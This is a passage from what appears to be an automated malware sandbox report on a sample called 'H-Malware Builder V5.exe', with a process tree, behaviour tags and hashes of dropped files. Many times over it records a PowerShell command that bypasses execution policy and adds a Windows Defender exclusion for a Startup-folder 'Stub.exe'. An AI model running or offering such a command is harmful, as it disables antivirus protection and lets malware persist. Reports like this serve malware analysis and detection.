                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
                                                                                                                                                                                    44⤵
                                                                                                                                                                                      PID:4484
                                                                                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
                                                                                                                                                                                        45⤵
                                                                                                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                        PID:1992
                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
                                                                                                                                                                                        45⤵
                                                                                                                                                                                          PID:216
                                                                                                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
                                                                                                                                                                                            46⤵
                                                                                                                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                            PID:1524
                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
                                                                                                                                                                                            46⤵
                                                                                                                                                                                              PID:3112
                                                                                                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
                                                                                                                                                                                                47⤵
                                                                                                                                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                PID:516
                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
                                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
                                                                                                                                                                                                47⤵
                                                                                                                                                                                                  PID:1292
                                                                                                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
                                                                                                                                                                                                    48⤵
                                                                                                                                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                    PID:316
                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
                                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
                                                                                                                                                                                                    48⤵
                                                                                                                                                                                                      PID:5084
                                                                                                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
                                                                                                                                                                                                        49⤵
                                                                                                                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                        PID:2264
                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
                                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
                                                                                                                                                                                                        49⤵
                                                                                                                                                                                                          PID:740
                                                                                                                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
                                                                                                                                                                                                            50⤵
                                                                                                                                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                            PID:700
                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
                                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
                                                                                                                                                                                                            50⤵
                                                                                                                                                                                                              PID:4452
                                                                                                                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
                                                                                                                                                                                                                51⤵
                                                                                                                                                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                PID:3724
                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
                                                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
                                                                                                                                                                                                                51⤵
                                                                                                                                                                                                                  PID:1876
                                                                                                                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
                                                                                                                                                                                                                    52⤵
                                                                                                                                                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                    PID:2164
                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
                                                                                                                                                                                                                    52⤵
                                                                                                                                                                                                                      PID:4456
                                                                                                                • C:\Windows\system32\taskmgr.exe
                                                                                                                  "C:\Windows\system32\taskmgr.exe" /4
                                                                                                                  2⤵
                                                                                                                  • Checks SCSI registry key(s)
                                                                                                                  • Checks processor information in registry
                                                                                                                  • Modifies registry class
                                                                                                                  • Suspicious behavior: GetForegroundWindowSpam
                                                                                                                  • Suspicious use of FindShellTrayWindow
                                                                                                                  • Suspicious use of SendNotifyMessage
                                                                                                                  PID:760
                                                                                                                • C:\Windows\System32\kpkopw.exe
                                                                                                                  "C:\Windows\System32\kpkopw.exe"
                                                                                                                  2⤵
                                                                                                                    PID:4232
                                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe"
                                                                                                                    2⤵
                                                                                                                    • Enumerates system info in registry
                                                                                                                    • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                                                                                                                    PID:4932
                                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x11c,0x120,0x124,0x118,0xf4,0x7ffdfdd9cc40,0x7ffdfdd9cc4c,0x7ffdfdd9cc58
                                                                                                                      3⤵
                                                                                                                        PID:1628
                                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1940,i,8314180667877133140,17695175517253420618,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1932 /prefetch:2
                                                                                                                        3⤵
                                                                                                                          PID:5104
                                                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2228,i,8314180667877133140,17695175517253420618,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2448 /prefetch:3
                                                                                                                          3⤵
                                                                                                                            PID:456
                                                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2272,i,8314180667877133140,17695175517253420618,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2464 /prefetch:8
                                                                                                                            3⤵
                                                                                                                              PID:4872
                                                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3196,i,8314180667877133140,17695175517253420618,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3204 /prefetch:1
                                                                                                                              3⤵
                                                                                                                                PID:3864
                                                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3360,i,8314180667877133140,17695175517253420618,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3348 /prefetch:1
                                                                                                                                3⤵
                                                                                                                                  PID:2780
                                                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=3772,i,8314180667877133140,17695175517253420618,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3744 /prefetch:1
                                                                                                                                  3⤵
                                                                                                                                    PID:1560
                                                                                                                              • C:\Windows\system32\svchost.exe
                                                                                                                                C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
                                                                                                                                1⤵
                                                                                                                                  PID:3664
                                                                                                                                • C:\Windows\system32\DllHost.exe
                                                                                                                                  C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                                                                  1⤵
                                                                                                                                    PID:3856
                                                                                                                                  • C:\Windows\System32\RuntimeBroker.exe
                                                                                                                                    C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                                    1⤵
                                                                                                                                      PID:4008
                                                                                                                                    • C:\Windows\System32\RuntimeBroker.exe
                                                                                                                                      C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                                      1⤵
                                                                                                                                      • Suspicious use of UnmapMainImage
                                                                                                                                      PID:3568
                                                                                                                                    • C:\Windows\system32\svchost.exe
                                                                                                                                      C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
                                                                                                                                      1⤵
                                                                                                                                      • Modifies data under HKEY_USERS
                                                                                                                                      PID:4928
                                                                                                                                    • C:\Windows\System32\svchost.exe
                                                                                                                                      C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
                                                                                                                                      1⤵
                                                                                                                                        PID:3276
                                                                                                                                      • C:\Windows\system32\svchost.exe
                                                                                                                                        C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
                                                                                                                                        1⤵
                                                                                                                                          PID:1240
                                                                                                                                        • C:\Windows\system32\svchost.exe
                                                                                                                                          C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
                                                                                                                                          1⤵
                                                                                                                                            PID:4548
                                                                                                                                          • C:\Windows\system32\SppExtComObj.exe
                                                                                                                                            C:\Windows\system32\SppExtComObj.exe -Embedding
                                                                                                                                            1⤵
                                                                                                                                              PID:3148
                                                                                                                                            • C:\Windows\System32\svchost.exe
                                                                                                                                              C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
                                                                                                                                              1⤵
                                                                                                                                                PID:3780
                                                                                                                                              • C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
                                                                                                                                                "C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
                                                                                                                                                1⤵
                                                                                                                                                • Drops file in System32 directory
                                                                                                                                                • Modifies data under HKEY_USERS
                                                                                                                                                PID:4180
                                                                                                                                              • C:\Windows\system32\DllHost.exe
                                                                                                                                                C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                                                                                1⤵
                                                                                                                                                  PID:1008
                                                                                                                                                • C:\Windows\system32\svchost.exe
                                                                                                                                                  C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc
                                                                                                                                                  1⤵
                                                                                                                                                    PID:5108
                                                                                                                                                  • C:\Windows\System32\RuntimeBroker.exe
                                                                                                                                                    C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                                                    1⤵
                                                                                                                                                      PID:2372
                                                                                                                                                    • C:\Windows\System32\WaaSMedicAgent.exe
                                                                                                                                                      C:\Windows\System32\WaaSMedicAgent.exe 118be8a46aabf8ea86f1c11083eed5b5 E5Lzf3E750CwH6qnTAd5Mw.0.1.0.0.0
                                                                                                                                                      1⤵
                                                                                                                                                      • Sets service image path in registry
                                                                                                                                                      • Modifies data under HKEY_USERS
                                                                                                                                                      PID:1444
                                                                                                                                                      • C:\Windows\System32\Conhost.exe
                                                                                                                                                        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                        2⤵
                                                                                                                                                          PID:3924
                                                                                                                                                      • C:\Windows\system32\svchost.exe
                                                                                                                                                        C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
                                                                                                                                                        1⤵
                                                                                                                                                        • Drops file in Windows directory
                                                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                        PID:3044
                                                                                                                                                      • C:\Windows\system32\wbem\wmiprvse.exe
                                                                                                                                                        C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                                                                        1⤵
                                                                                                                                                        • Checks BIOS information in registry
                                                                                                                                                        • Writes to the Master Boot Record (MBR)
                                                                                                                                                        • Checks SCSI registry key(s)
                                                                                                                                                        • Enumerates system info in registry
                                                                                                                                                        PID:2272
                                                                                                                                                      • C:\Windows\system32\backgroundTaskHost.exe
                                                                                                                                                        "C:\Windows\system32\backgroundTaskHost.exe" -ServerName:ShellFeedsUI.AppXnj65k2d1a1rnztt2t2nng5ctmk3e76pn.mca
                                                                                                                                                        1⤵
                                                                                                                                                          PID:4308
                                                                                                                                                        • C:\Windows\servicing\TrustedInstaller.exe
                                                                                                                                                          C:\Windows\servicing\TrustedInstaller.exe
                                                                                                                                                          1⤵
                                                                                                                                                            PID:4724
                                                                                                                                                          • C:\Windows\system32\svchost.exe
                                                                                                                                                            C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc
                                                                                                                                                            1⤵
                                                                                                                                                              PID:1432
                                                                                                                                                            • C:\Windows\System32\mousocoreworker.exe
                                                                                                                                                              C:\Windows\System32\mousocoreworker.exe -Embedding
                                                                                                                                                              1⤵
                                                                                                                                                              • Checks processor information in registry
                                                                                                                                                              • Enumerates system info in registry
                                                                                                                                                              • Modifies data under HKEY_USERS
                                                                                                                                                              PID:2688
                                                                                                                                                            • C:\Windows\System32\rundll32.exe
                                                                                                                                                              C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                                                                                                                                                              1⤵
                                                                                                                                                                PID:4772
                                                                                                                                                              • C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe
                                                                                                                                                                C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe -Embedding
                                                                                                                                                                1⤵
                                                                                                                                                                  PID:1236
                                                                                                                                                                • C:\Windows\system32\svchost.exe
                                                                                                                                                                  C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s PcaSvc
                                                                                                                                                                  1⤵
                                                                                                                                                                    PID:1020
                                                                                                                                                                  • C:\Windows\system32\DllHost.exe
                                                                                                                                                                    C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
                                                                                                                                                                    1⤵
                                                                                                                                                                      PID:3676
                                                                                                                                                                    • C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
                                                                                                                                                                      "C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
                                                                                                                                                                      1⤵
                                                                                                                                                                        PID:4124

                                                                                                                                                                      Network

                                                                                                                                                                      MITRE ATT&CK Enterprise v15

                                                                                                                                                                      Replay Monitor

                                                                                                                                                                      Loading Replay Monitor...

                                                                                                                                                                      Downloads

                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

                                                                                                                                                                        Filesize

                                                                                                                                                                        1KB

                                                                                                                                                                        MD5

                                                                                                                                                                        89695ea6ffda381f899b6759622dacfb

                                                                                                                                                                        SHA1

                                                                                                                                                                        9f7057d730ed344525591e48c213fda1c7839764

                                                                                                                                                                        SHA256

                                                                                                                                                                        da43107eba96b037efedcff30e4181e4805c040d150e4d9249d44bba9b03b1ca

                                                                                                                                                                        SHA512

                                                                                                                                                                        9a11d5089c8154718f2698877b6f7fd460327bf98fcfbd1714a81c530dbcf19369c7fb6be2a824a50b5992848827ee2b6aaecb6a4565f2daded11fc4c7bcba36

                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

                                                                                                                                                                        Filesize

                                                                                                                                                                        2B

                                                                                                                                                                        MD5

                                                                                                                                                                        d751713988987e9331980363e24189ce

                                                                                                                                                                        SHA1

                                                                                                                                                                        97d170e1550eee4afc0af065b78cda302a97674c

                                                                                                                                                                        SHA256

                                                                                                                                                                        4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

                                                                                                                                                                        SHA512

                                                                                                                                                                        b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

                                                                                                                                                                        Filesize

                                                                                                                                                                        356B

                                                                                                                                                                        MD5

                                                                                                                                                                        13a065fc3c014de3ea930c26b3d27b69

                                                                                                                                                                        SHA1

                                                                                                                                                                        5d29e649173d6edcb726f8c06ee509bb61509146

                                                                                                                                                                        SHA256

                                                                                                                                                                        5166f51fde43bdaefcc9d0e2ec048012e7fcff674aa699fc1396db401cf33090

                                                                                                                                                                        SHA512

                                                                                                                                                                        e05af8148bd875abf1618dcfe43bed35000e4a8ec121229b1813ee284fa7847c81490549876361c556910f47ec9647fb41b30374f6cc66cf1de2d1d569117407

                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                                                                                                                                                        Filesize

                                                                                                                                                                        8KB

                                                                                                                                                                        MD5

                                                                                                                                                                        8a8446c749cc09448f9debd7a6f64397

                                                                                                                                                                        SHA1

                                                                                                                                                                        bd7c40e448266f696084d0c8a41829d43d83fada

                                                                                                                                                                        SHA256

                                                                                                                                                                        08d45f06d8bf1b38d7fd96035bab9637e619136eb754d93026ab9c29754c19db

                                                                                                                                                                        SHA512

                                                                                                                                                                        28c3c3f9aebd26e098f6dff09d428a41096ff3b993925935878891a1bea76a328a46dff893989fe3204e7b87cd214f348aee21943234a08f67f9ad5f9ec1581c

                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

                                                                                                                                                                        Filesize

                                                                                                                                                                        116KB

                                                                                                                                                                        MD5

                                                                                                                                                                        60719d5702dfdc97cd4de535158a2b0c

                                                                                                                                                                        SHA1

                                                                                                                                                                        d9046eec5c2bffaa73021a3fde81c21e26e6f931

                                                                                                                                                                        SHA256

                                                                                                                                                                        2c279dcf9a9f2157e1b19aad5692dc715d78ce13010fdd251a2a4e7e89e1cf5e

                                                                                                                                                                        SHA512

                                                                                                                                                                        17af8c2a4788fba8854816556d2b708786422ec8e951f20eb98550b5920a235f3d6051af0b504053f629000dc7f03b8e1363f50d43a05020375c85a91346c0e8

                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\ShaderCache\data_1

                                                                                                                                                                        Filesize

                                                                                                                                                                        264KB

                                                                                                                                                                        MD5

                                                                                                                                                                        f50f89a0a91564d0b8a211f8921aa7de

                                                                                                                                                                        SHA1

                                                                                                                                                                        112403a17dd69d5b9018b8cede023cb3b54eab7d

                                                                                                                                                                        SHA256

                                                                                                                                                                        b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec

                                                                                                                                                                        SHA512

                                                                                                                                                                        bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58

                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\H-Malware Builder V5.exe.log

                                                                                                                                                                        Filesize

                                                                                                                                                                        654B

                                                                                                                                                                        MD5

                                                                                                                                                                        2ff39f6c7249774be85fd60a8f9a245e

                                                                                                                                                                        SHA1

                                                                                                                                                                        684ff36b31aedc1e587c8496c02722c6698c1c4e

                                                                                                                                                                        SHA256

                                                                                                                                                                        e1b91642d85d98124a6a31f710e137ab7fd90dec30e74a05ab7fcf3b7887dced

                                                                                                                                                                        SHA512

                                                                                                                                                                        1d7e8b92ef4afd463d62cfa7e8b9d1799db5bf2a263d3cd7840df2e0a1323d24eb595b5f8eb615c6cb15f9e3a7b4fc99f8dd6a3d34479222e966ec708998aed1

                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                                                                                                                                                                        Filesize

                                                                                                                                                                        2KB

                                                                                                                                                                        MD5

                                                                                                                                                                        d85ba6ff808d9e5444a4b369f5bc2730

                                                                                                                                                                        SHA1

                                                                                                                                                                        31aa9d96590fff6981b315e0b391b575e4c0804a

                                                                                                                                                                        SHA256

                                                                                                                                                                        84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

                                                                                                                                                                        SHA512

                                                                                                                                                                        8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                        Filesize

                                                                                                                                                                        944B

                                                                                                                                                                        MD5

                                                                                                                                                                        65a68df1062af34622552c4f644a5708

                                                                                                                                                                        SHA1

                                                                                                                                                                        6f6ecf7b4b635abb0b132d95dac2759dc14b50af

                                                                                                                                                                        SHA256

                                                                                                                                                                        718dc2f5f4a6dbb7fab7f3db05bd7f602fb16526caae7084ab46c3ab4e7bad35

                                                                                                                                                                        SHA512

                                                                                                                                                                        4e460eb566032942547b58411222dd26ae300a95f83cf5ae6df58ebd28594341123611b348bd4031a33bc7f38307d5cb8fb677bba8c896919e3eee677a104d4d

                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                        Filesize

                                                                                                                                                                        944B

                                                                                                                                                                        MD5

                                                                                                                                                                        aeceee3981c528bdc5e1c635b65d223d

                                                                                                                                                                        SHA1

                                                                                                                                                                        de9939ed37edca6772f5cdd29f6a973b36b7d31b

                                                                                                                                                                        SHA256

                                                                                                                                                                        b99f3c778a047e0348c92c16e0419fa29418d10d0fec61ad8283e92a094a2b32

                                                                                                                                                                        SHA512

                                                                                                                                                                        df48285f38e9284efdbd9f8d99e2e94a46fb5465953421ab88497b73ae06895b98ea5c98796560810a6f342c31a9112ea87e03cd3e267fd8518d7585f492a8fb

                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                        Filesize

                                                                                                                                                                        944B

                                                                                                                                                                        MD5

                                                                                                                                                                        b7189719e6df2c3dfc76197ec3f31f7a

                                                                                                                                                                        SHA1

                                                                                                                                                                        effd91412deadc87cc10ef76cdecc1e0b54b6d41

                                                                                                                                                                        SHA256

                                                                                                                                                                        1c72fa37d078b92c7e900b2e3d17c43c34d936a696a8ddf6c519f4a80308b892

                                                                                                                                                                        SHA512

                                                                                                                                                                        2df1f1d45844da7ffb17cdfb411f223e9c614c00f5cf7eb5ba92bf7ba174875af2a515371208286c95c0479c934ae2c6a83dfc0b54380be89db1eddd19faf978

                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                        Filesize

                                                                                                                                                                        944B

                                                                                                                                                                        MD5

                                                                                                                                                                        110b59ca4d00786d0bde151d21865049

                                                                                                                                                                        SHA1

                                                                                                                                                                        557e730d93fdf944a0cad874022df1895fb5b2e2

                                                                                                                                                                        SHA256

                                                                                                                                                                        77f69011c214ea5a01fd2035d781914c4893aee66d784deadc22179eadfdf77f

                                                                                                                                                                        SHA512

                                                                                                                                                                        cb55ac6eca50f4427718bace861679c88b2fdfea94d30209e8d61ca73a6ce9f8c4b5334922d2660a829b0636d20cbdf3bae1497c920e604efe6c636019feb10e

                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                        Filesize

                                                                                                                                                                        944B

                                                                                                                                                                        MD5

                                                                                                                                                                        b1a1d8b05525b7b0c5babfd80488c1f2

                                                                                                                                                                        SHA1

                                                                                                                                                                        c85bbd6b7d0143676916c20fd52720499c2bb5c6

                                                                                                                                                                        SHA256

                                                                                                                                                                        adad192fc86c2f939fd3f70cb9ad323139a4e100f7c90b4454e2c53bdbc9b705

                                                                                                                                                                        SHA512

                                                                                                                                                                        346c6513c1373bab58439e37d3f75de1c5c587d7eb27076cf696e885a027b3b38d70b585839d1a2e7f2270cdcf0dac8c1fdff799f3b1158242ae9e3364c2a06e

                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                        Filesize

                                                                                                                                                                        944B

                                                                                                                                                                        MD5

                                                                                                                                                                        83685d101174171875b4a603a6c2a35c

                                                                                                                                                                        SHA1

                                                                                                                                                                        37be24f7c4525e17fa18dbd004186be3a9209017

                                                                                                                                                                        SHA256

                                                                                                                                                                        0c557845aab1da497bbff0e8fbe65cabf4cb2804b97ba8ae8c695a528af70870

                                                                                                                                                                        SHA512

                                                                                                                                                                        005a97a8e07b1840abdcef86a7881fd9bdc8acbfdf3eafe1dceb6374060626d81d789e57d87ca4096a39e28d5cca00f8945edff0a747591691ae75873d2b3fb5

                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                        Filesize

                                                                                                                                                                        944B

                                                                                                                                                                        MD5

                                                                                                                                                                        96e3b86880fedd5afc001d108732a3e5

                                                                                                                                                                        SHA1

                                                                                                                                                                        8fc17b39d744a9590a6d5897012da5e6757439a3

                                                                                                                                                                        SHA256

                                                                                                                                                                        c3077e4cadb4ed246c02abe55aa6cf832fee4c2546b7addb7d22cd1c7c8c1294

                                                                                                                                                                        SHA512

                                                                                                                                                                        909b1968f7204fa7029109b02232d8cc5438f6b4dc7c9044e4e47c59fcee538199b13029e36592b12ed573d48a308dd4822d2ced4129ab08d4111897e02be55d

                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                        Filesize

                                                                                                                                                                        944B

                                                                                                                                                                        MD5

                                                                                                                                                                        fe9b96bc4e29457b2d225a5412322a52

                                                                                                                                                                        SHA1

                                                                                                                                                                        551e29903e926b5d6c52a8f57cf10475ba790bd0

                                                                                                                                                                        SHA256

                                                                                                                                                                        e81b9bfd38a5199813d703d5caf75baa6f62847b2b9632302b5d6f10dd6cf997

                                                                                                                                                                        SHA512

